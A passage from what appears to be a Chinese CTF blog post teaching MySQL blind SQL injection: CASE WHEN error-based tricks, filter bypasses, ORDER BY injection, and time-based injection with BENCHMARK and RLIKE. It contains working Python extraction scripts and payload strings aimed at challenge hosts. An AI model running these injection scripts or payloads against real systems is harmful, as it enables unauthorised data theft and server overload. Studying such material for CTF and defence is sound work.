\u5728SQL\u4e2d\u662f\u7c7b\u578b\u8f6c\u6362\u7b26\uff0c\u7528\u6765\u5f3a\u5236\u5c06\u5176\u540e\u7684\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u5b57\u8282,\u5373\u5c06\u5b57\u7b26\u4e32\u5f3a\u5236\u6309\u5b57\u8282\u8fdb\u884c\u6bd4\u8f83\u800c\u4e0d\u662f\u5b57\u7b26\uff0c\u5177\u4f53\u7684\u8868\u73b0\u5373\u4e3a\u533a\u5206\u5927\u5c0f\u5199\uff0c\u4e3b\u8981\u539f\u56e0\u662f\u6b63\u5e38\u60c5\u51b5\u4e0bsql\u662f\u4e0d\u533a\u5206\u5927\u5c0f\u5199\u7684\uff0c\u9664\u975e\u662f\u7528ascii\u7801\u5339\u914d\u5b57\u7b26\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">case when<\/h3>\n\n\n\n<p>\u53c2\u8003<a href=\"https:\/\/cloud.tencent.com\/developer\/article\/2070126\">HFCTF2022_babysql\u9898\u76ee\u590d\u73b0<\/a><\/p>\n\n\n\n<p>\u5b98\u65b9\u6587\u6863\u4e2d\u89e3\u91ca:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CASE value WHEN [compare-value] THEN result [WHEN [compare-value] THEN result \u2026] [ELSE result] END CASE WHEN [condition] THEN <em>result<\/em> [WHEN [condition] THEN result \u2026] [ELSE result] END<\/li>\n<\/ul>\n\n\n\n<p>\u5728\u7b2c\u4e00\u4e2a\u65b9\u6848\u7684\u8fd4\u56de\u7ed3\u679c\u4e2d\uff0c value=compare-value\u3002\u800c\u7b2c\u4e8c\u4e2a\u65b9\u6848\u7684\u8fd4\u56de\u7ed3\u679c\u662f\u7b2c\u4e00\u79cd\u60c5\u51b5\u7684\u771f\u5b9e\u7ed3\u679c\u3002\u5982\u679c\u6ca1\u6709\u5339\u914d\u7684\u7ed3\u679c\u503c\uff0c\u5219\u8fd4\u56de\u7ed3\u679c\u4e3aELSE\u540e\u7684\u7ed3\u679c\uff0c\u5982\u679c\u6ca1\u6709ELSE \u90e8\u5206\uff0c\u5219\u8fd4\u56de\u503c\u4e3a NULL\u3002<\/p>\n\n\n\n<p>\u6bd4\u5982\u6211\u4eec\u4f7f\u7528SELECT CASE 1 WHEN 1 THEN &#8216;one&#8217; WHEN 2 THEN &#8216;two&#8217; ELSE &#8216;more&#8217; END; \u56de\u663e\u5c31\u662f\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-13.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"703\" height=\"260\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-13.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1422\"  sizes=\"auto, (max-width: 703px) 100vw, 703px\" \/><\/div><\/figure>\n\n\n\n<p>\u56e0\u4e3a\u6211\u4eec\u7684select case 1 \u6240\u4ee5\u8fd4\u56de\u7684\u662fwhen 1\u540e\u9762\u8ddf\u7684\u7ed3\u679c\u3002\u5f53\u7136\uff0c\u8fd8\u53ef\u4ee5\u8fdb\u884c\u6761\u4ef6\u5224\u65ad\uff0c\u5982\u4f7f\u7528SELECT CASE WHEN 1&gt;0 THEN &#8216;true&#8217; ELSE &#8216;false&#8217; END;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-14.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"516\" height=\"251\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-14.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1423\"  sizes=\"auto, (max-width: 516px) 100vw, 516px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u65f6\u56e0\u4e3a1&gt;0\u7528\u771f\uff0c\u6240\u4ee5\u8fd4\u56detrue\u3002\u82e5\u8bed\u53e5\u7684\u5224\u65ad\u5747\u6ca1\u6709\u7ed3\u679c\uff0c\u5219\u8fd4\u56denull\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-15.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"627\" height=\"261\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-15.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1424\"  sizes=\"auto, (max-width: 627px) 100vw, 627px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f53\u9898\u76ee\u9700\u8981\u76f2\u6ce8\u4f46\u8fc7\u6ee4\u4e86if()\u6216\u62ec\u53f7\u7b49\u8ba9\u6211\u4eec\u4e0d\u80fd\u4f7f\u7528\u51fd\u6570\u65f6\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u4f7f\u7528case when\u8fdb\u884c\u76f2\u6ce8\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; SELECT * FROM tb;\n+-------------------+------+\n| flag              | id   |\n+-------------------+------+\n| flag{test_f1llag} |    1 |\n+-------------------+------+\n1 row in set (0.00 sec)\nmysql&gt; SELECT id FROM tb WHERE id=0 || CASE 1 WHEN flag REGEXP '^f' THEN 1 ELSE 1+~0 \t   END;\n+------+\n| id   |\n+------+\n|    1 |\n+------+\n1 row in set (0.00 sec)<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u6ee1\u8db3\u6761\u4ef6\uff0c\u5219\u4e0d\u4f1a\u89e6\u53d1\u540e\u97621+~0\uff0c\u6b63\u5e38\u56de\u663e\uff0c\u800c\u5982\u679c\u4e0d\u6ee1\u8db3\u6761\u4ef6\uff0c\u5219\u4f1a\u5f15\u53d1\u62a5\u9519\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; SELECT id FROM tb WHERE id=0 || CASE 1 WHEN flag REGEXP '^a' THEN 1 ELSE 1+~0 END;\nERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(1 + ~(0))'<\/code><\/pre>\n\n\n\n<p>\u8fd9\u662f\u56e0\u4e3a<code>~<\/code> \u4e3a\u53d6\u53cd\u64cd\u4f5c\u7b26\uff0c0 \u53d6\u53cd\u5373\u4e3a\u6700\u5927\u503c\uff0c\u518d\u52a0 1 \u5c31\u4f1a\u5bfc\u81f4\u6ea2\u51fa\u62a5\u9519\u4e86\uff0c\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u8fd9\u6837\u57fa\u4e8e\u62a5\u9519\u7684\u76f2\u6ce8\u6765\u7206\u7834flag\u3002\u5f53\u7136\uff0c\u8fd9\u9053\u9898\u662f\u5f53\u5e74\u864e\u7b26CTF\u7684\u9898\uff0c\u6ca1\u8fd9\u4e48\u7b80\u5355\uff0c\u8fd8\u6709\u5176\u4ed6\u7684\u9650\u5236\uff0c\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u5b66\u8ba1\u6570\u6cd5\u548c\u5355(\u53cd)\u5f15\u53f7\u7ed5\u8fc7\u7a7a\u683c\uff0c\u4e5f\u5c31\u662f\u8fd9\u6837\u6784\u9020\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; SELECT id FROM tb WHERE id=0 ||CASE+1e0WHEN`flag`REGEXP'^f'THEN+1e0ELSE~0e0+~0e0END;\n+------+\n| id   |\n+------+\n|    1 |\n+------+\n1 row in set (0.00 sec)\n\nmysql&gt; SELECT id FROM tb WHERE id=0 ||CASE+1e0WHEN`flag`REGEXP'^a'THEN+1e0ELSE~0e0+~0e0END;\nERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(~(0e0) + ~(0e0))'<\/code><\/pre>\n\n\n\n<p>\u6ce8\u610f <code>1E0+~0<\/code>\u662f\u4e0d\u4f1a\u62a5\u6ea2\u51fa\u9519\u8bef\u7684\uff0c\u56e0\u4e3a\u4f7f\u7528\u4e86\u79d1\u5b66\u8ba1\u6570\u6cd5\uff0c\u8303\u56f4\u589e\u5927\u4e86\u3002\u7136\u540e\u8fd8\u6709\u4e00\u4e2a\u95ee\u9898\u5c31\u662f\u8981\u533a\u5206\u5927\u5c0f\u5199\uff0c\u5f53\u65f6\u90a3\u4e2a\u9898\u662f\u628abinary\u7981\u4e86\u7684\uff0c\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528COLLATE&#8217;utf8mb4_bin&#8217;\u6216COLLATE&#8217;utf8mb4_0900_as_cs&#8217;\u4ee3\u66ffbinary\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; SELECT 'abc' LIKE 'ABC';\n        -&gt; 1\nmysql&gt; SELECT 'abc' LIKE _utf8mb4 'ABC' COLLATE utf8mb4_0900_as_cs;\n        -&gt; 0\nmysql&gt; SELECT 'abc' LIKE _utf8mb4 'ABC' COLLATE utf8mb4_bin;\n        -&gt; 0\nmysql&gt; SELECT 'abc' LIKE BINARY 'ABC';\n        -&gt; 0<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u4e5f\u5c31\u662f\u4e00\u4e2a\u5f88\u666e\u901a\u7684\u76f2\u6ce8\u4e86\uff0c\u9644\u4e00\u4e2a\u811a\u672c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport time\n\nsession = requests.session()\n\nburp0_url = \"http:\/\/47.107.231.226:30631\/login\"\nburp0_headers = {\"User-Agent\": \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko\/20100101 Firefox\/97.0\",\n                 \"Accept\": \"text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\",\n                 \"Accept-Language\": \"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\", \"Accept-Encoding\": \"gzip, deflate\",\n                 \"Content-Type\": \"application\/x-www-form-urlencoded\", \"Origin\": \"http:\/\/47.107.231.226:30631\", \"Connection\": \"close\", \"Referer\": \"http:\/\/47.107.231.226:30631\/\",\n                 \"Upgrade-Insecure-Requests\": \"1\"}\n\nalphabet = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!.@%&amp;*{}&#91;]_-^\/\"\npassword = '^'\n\nwhile True:\n    for i in alphabet:\n        burp0_data = {\"username\": f\"1'||case+1E0when`password`regexp'{password + i}'COLLATE'utf8mb4_bin'then+1E0else+!0E0+~0+!0E0end||'0\", \"password\": \"6878\"}\n        r = session.post(burp0_url, headers=burp0_headers, data=burp0_data)\n        if r.status_code == 401:\n            print(i)\n            password += i\n            break\n        time.sleep(0.3)\n    print(password)<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u518d\u5f15\u7533\u4e00\u4e0b\uff0c\u6211\u4eec\u5728\u8fd9\u91cc\u89e6\u53d1\u62a5\u9519\u4f7f\u7528\u4e86~\u8fdb\u884c\u53d6\u53cd\uff0c\u8fd9\u73a9\u610f\u513f\u5982\u679c\u88abban\u4e86\u600e\u4e48\u529e\u5462\uff1f\u4e8b\u5b9e\u4e0a~0\u662f\u6709\u5177\u4f53\u7684\u503c\u7684\uff0c\u5c31\u662f9223372036854775807\uff0c\u6240\u4ee5\u7528\u6700\u5927\u6570\u52a0\u4e00\u53739223372036854775807+1\u4e5f\u662f\u80fd\u5f15\u53d1\u62a5\u9519\uff0c\u9664\u6b64\u4e4b\u5916\u8fd8\u53ef\u4ee5\u7528\u5f02\u6216\uff0c\u8fd9\u4e2apayload\u4e5f\u884c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>username=1'||case'1'when`username`COLLATE'utf8mb4_0900_as_cs'like'a%'then'1'else'1'^18446744073709551614%252b2^'1'end%253d'0&amp;password=123<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">order by\u6ce8\u5165<\/h3>\n\n\n\n<p>\u8fd9\u79cd\u65b9\u6cd5\u8fd0\u7528\u7684\u60c5\u51b5\u6bd4\u8f83\u6781\u7aef\u4e00\u4e9b\uff0c\u5982\u5e03\u5c14\u76f2\u6ce8\u65f6\uff0c\u5b57\u7b26\u622a\u53d6\/\u6bd4\u8f83\u9650\u5236\u5f88\u4e25\u683c\uff0c\u6211\u4eec\u53ef\u4ee5\u505a\u5230\u505a\u5230\u4e0d\u9700\u8981\u4f7f\u7528<code>like\u3001rlike\u3001regexp<\/code>\u7b49\u5339\u914d\u8bed\u53e5\u4ee5\u53ca\u5b57\u7b26\u64cd\u4f5c\u51fd\u6570\uff0c\u5728\u77e5\u9053\u4e00\u4e2a\u5b57\u6bb5\u540d\u7684\u60c5\u51b5\u4e0b\u83b7\u5f97\u53e6\u4e00\u4e2a\u5b57\u6bb5\u7684\u503c\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u51e0\u4e2a\u4f8b\u5b50\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d = 'admin' union distinct select 1,\"f\" order by 2 desc <\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"783\" height=\"267\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1455\"  sizes=\"auto, (max-width: 783px) 100vw, 783px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d = 'admin' union distinct select 1,\"g\" order by 2 desc <\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-22.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"836\" height=\"287\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-22.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1457\"  sizes=\"auto, (max-width: 836px) 100vw, 836px\" \/><\/div><\/figure>\n\n\n\n<p>\u6211\u4eec\u8fd9\u91cc\u5176\u5b9e\u5c31\u662f\u5bf9\u7b2c\u4e8c\u4e2a\u5b57\u6bb5\u8fdb\u884c\u6392\u5e8f,\u8ba9\u4ed6\u4ece\u6700\u5c0f\u5f00\u59cb\u53d8\u5316,\u5f53\u67e5\u8be2\u7ed3\u679c\u7b2c\u4e00\u6761\u8fd4\u56de\u7684\u7528\u6237\u540d\u5b57\u6bb5\u662f1\u7684\u65f6\u5019,\u6211\u4eec\u5c31\u77e5\u9053\u8fd9\u4e2a\u5b57\u7b26\u7684ascii\u7801\u51cf\u4e00\u5c31\u662f\u8ddf\u6570\u636e\u5e93\u4e2d\u7684\u76f8\u7b49\u3002\u6240\u4ee5\u5c31\u53ef\u4ee5\u4e00\u4f4d\u4e00\u4f4d\u7684\u731c\u51fa\u6765\u5bc6\u7801\u5b57\u6bb5\u4e86\u3002\u4e00\u4e2a\u4f8b\u5b50\u5c31\u662f<a href=\"https:\/\/fushuling.com\/index.phphttps:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/28\/hbctf2017%e5%a4%a7%e7%be%8e%e8%a5%bf%e5%ae%89\/\">[HBCTF2017]\u5927\u7f8e\u897f\u5b89<\/a>\uff0c\u8fd9\u4e2a\u9898\u91cc\u6587\u4ef6\u88ab\u4e0a\u4f20\u540e\u4f1a\u88ab\u91cd\u547d\u540d\uff0c\u6211\u4eec\u5df2\u77e5\u7684\u6761\u4ef6\u4fbf\u662f\u6587\u4ef6\u7684id\uff0c\u4f46\u540d\u79f0\u672a\u77e5\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u4f7f\u7528\u8fd9\u79cd\u6280\u5de7\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select location from image where id=1 and union select 0x41 order by 1<\/code><\/pre>\n\n\n\n<p>\u5f53\u6b63\u786e\u7684\u503c\u4e3a\u6211\u4eec\u8f93\u5165\u7684\u503c\u3002\u90a3\u4e48\u5c31\u53ef\u4ee5\u6b63\u5e38\u56de\u663e\u51fa\u6587\u4ef6\u768416\u8fdb\u5236\u5185\u5bb9\uff0c\u6700\u540e\u4e00\u4f4d\u4e00\u4f4d\u5339\u914d\u51fa\u771f\u6b63\u7684\u6587\u4ef6\u540d\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u65f6\u95f4\u76f2\u6ce8<\/h2>\n\n\n\n<p>\u65f6\u95f4\u76f2\u6ce8\u6bd4\u5e03\u5c14\u76f2\u6ce8\u9ad8\u7ea7\u4e00\u70b9\uff0c\u662f\u5728\u9875\u9762\u4e0d\u5b58\u5728\u56de\u663e\u7684\u60c5\u51b5\u901a\u8fc7\u65f6\u95f4\u5dee\u8fdb\u884c\u6ce8\u5165\uff0c\u6240\u4ee5\u65f6\u95f4\u76f2\u6ce8\u8fd8\u662f\u6bd4\u5e03\u5c14\u76f2\u6ce8\u9ad8\u7ea7\u4e00\u70b9\uff0c\u4e00\u822c\u6765\u8bf4\u80fd\u7528\u5e03\u5c14\u76f2\u6ce8\u7684\u5730\u65b9\u90fd\u80fd\u7528\u65f6\u95f4\u76f2\u6ce8\uff0c\u6bd4\u5982\u8bed\u53e5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from users where username=-1 || if(length(database())&gt;8,sleep(3))<\/code><\/pre>\n\n\n\n<p>\u4f5c\u7528\u662f\u5982\u679clength(database())&gt;8\u5219\u6267\u884csleep(3)\u7684\u64cd\u4f5c\uff0c\u901a\u8fc7\u8bbf\u95ee\u7f51\u9875\u662f\u5426\u5b58\u5728\u65f6\u95f4\u5dee\u6765\u5224\u65ad\u6211\u4eec\u7684\u8bed\u53e5\u662f\u5426\u6b63\u786e\u6267\u884c\uff0c\u8fd9\u91cc\u5148\u4e0d\u8bb2\u811a\u672c\u7684\u5b9e\u73b0\uff0c\u5148\u95ee\u4e00\u4e2a\u95ee\u9898\uff0c\u5982\u679csleep\u88abban\u4e86\u8fd8\u80fd\u65f6\u95f4\u76f2\u6ce8\u5417\uff1f\u5f53\u7136\u662f\u53ef\u4ee5\u7684\uff0c\u6709\u5f88\u591a\u65b9\u6cd5\u90fd\u53ef\u4ee5\u4ee3\u66ffsleep\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u65f6\u95f4\u76f2\u6ce8sleep\u88abban\u600e\u4e48\u529e<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">benchmark()<\/h3>\n\n\n\n<p>benchmark()\u51fd\u6570\u7684\u4f5c\u7528\u662f\u91cd\u590d\u6267\u884c\u67d0\u8868\u8fbe\u5f0f\uff0c\u5982benchmark(10000000,md5(&#8216;yu22x&#8217;));<br>\u4f1a\u8ba1\u7b9710000000\u6b21md5(\u2018yu22x\u2019)\uff0c\u56e0\u4e3a\u6b21\u6570\u5f88\u591a\u6240\u4ee5\u5c31\u4f1a\u4ea7\u751f\u5ef6\u65f6\uff0c\u4f46\u8fd9\u79cd\u65b9\u6cd5\u5bf9\u670d\u52a1\u5668\u4f1a\u5bf9\u4ea7\u751f\u5f88\u5927\u7684\u8d1f\u8377\uff0c\u5bb9\u6613\u628a\u670d\u52a1\u5668\u8dd1\u5d29\uff0c\u5982\u679c\u5d29\u6389\u7684\u8bdd\u5c31\u628atime.sleep\u7684\u503c\u6539\u5927\u70b9\uff0c\u9664\u4e86md5\u8fd8\u53ef\u4ee5\u4f7f\u7528\u5176\u4ed6\u51fd\u6570\uff0c\u6bd4\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>benchmark(1000000,encode(\"hello\",\"good\"));\nbenchmark(1e7,sha1('kradress'));<\/code><\/pre>\n\n\n\n<p>\u6bd4\u5982\u8fd9\u662f\u4e00\u4e2a\u9488\u5bf9ctfshow web217\u7684\u811a\u672c(\u4e0d\u5f97\u4e0d\u8bf4\u4e8c\u5206\u6cd5\u5c31\u662f\u5feb)\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport time\n\n\nurl=\"http:\/\/a0b31d2e-2090-4e10-8341-7392b5a4f0de.challenge.ctf.show\/api\/\"\nflag=''\nfor i in range(1,200):\n    low=32\n    high=128\n    mid=(low+high)\/\/2\n    while low&lt;high:\n        # payload=\"0)or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))&gt;{}),BENCHMARK(1000000,md5('a')),0)#\".format(i,mid)\n        # payload=\"0)or if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxccb'),{},1))&gt;{}),BENCHMARK(1000000,md5('a')),0)#\".format(i,mid)\n        payload=\"0)or if((ascii(substr((select group_concat(flagaabc) from ctfshow_flagxccb),{},1))&gt;{}),BENCHMARK(1000000,md5('a')),0)#\".format(i,mid)\n        \n        data={\n            \"ip\":payload,\n            \"debug\":0\n        }\n        time1=time.time()\n        r=requests.post(url,data=data)\n        time2=time.time()\n        \n        print(low,mid,high)\n      \n\n        if time2-time1&gt;0.5:\n            low=mid+1\n        else:\n            high=mid\n        mid=(low+high)\/\/2\n    flag+=chr(mid)\n    print(flag)\n    if mid==32:\n        print(flag)  \n        break\n\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">RLIKE REGEXP\u6b63\u5219\u5339\u914d<\/h3>\n\n\n\n<p>\u901a\u8fc7<code>rpad<\/code>\u6216<code>repeat<\/code>\u6784\u9020\u957f\u5b57\u7b26\u4e32\uff0c\u52a0\u4ee5\u8ba1\u7b97\u91cf\u5927\u7684pattern\uff0c\u901a\u8fc7repeat\u7684\u53c2\u6570\u53ef\u4ee5\u63a7\u5236\u5ef6\u65f6\u957f\u77ed<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'<\/code><\/pre>\n\n\n\n<p>\u8fd9\u4e2apayload\u7684\u503c\u5c31\u7ea6\u7b49\u4e8esleep(5)\uff0c\u4f46\u662f\u901a\u8fc7\u9898\u76ee\u6d4b\u8bd5\u53d1\u73b0\u5ef6\u65f6\u5f88\u5c0f\uff0c\u6240\u4ee5\u628atimeout\u4e5f\u6539\u5c0f\u70b9\uff0c\u4e25\u91cd\u6000\u7591\u53ef\u80fd\u662fsleep(0.5)\uff0c\u8fd9\u662fctfshow web218\u7684\u811a\u672c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport time\n\n\nurl=\"http:\/\/982d6f48-bb6d-4823-8236-29009a00f0d6.challenge.ctf.show\/api\/\"\nflag=''\nfor i in range(1,200):\n    low=32\n    high=128\n    mid=(low+high)\/\/2\n    while low&lt;high:\n        # payload=\"0)or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))&gt;{}),(concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) rlike '(a.*)+(a.*)+b'),1)#\".format(i,mid)\n        # payload=\"0)or if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{},1))&gt;{}),(concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) rlike '(a.*)+(a.*)+b'),1)#\".format(i,mid)\n        payload=\"0)||if((ascii(substr((select group_concat(flagaac) from ctfshow_flagxc),{},1))&gt;{}),(concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) rlike '(a.*)+(a.*)+b'),1)#\".format(i,mid)\n        \n        data={\n            \"ip\":payload,\n            \"debug\":0\n        }\n        time1=time.time()\n        r=requests.post(url,data=data)\n        time2=time.time()\n        \n        print(low,mid,high)\n      \n\n        if time2-time1&gt;0.5:\n            low=mid+1\n        else:\n            high=mid\n        mid=(low+high)\/\/2\n    flag+=chr(mid)\n    print(flag)\n    if mid==32:\n        print(flag)  \n        break<\/code><\/pre>\n\n\n\n<h3 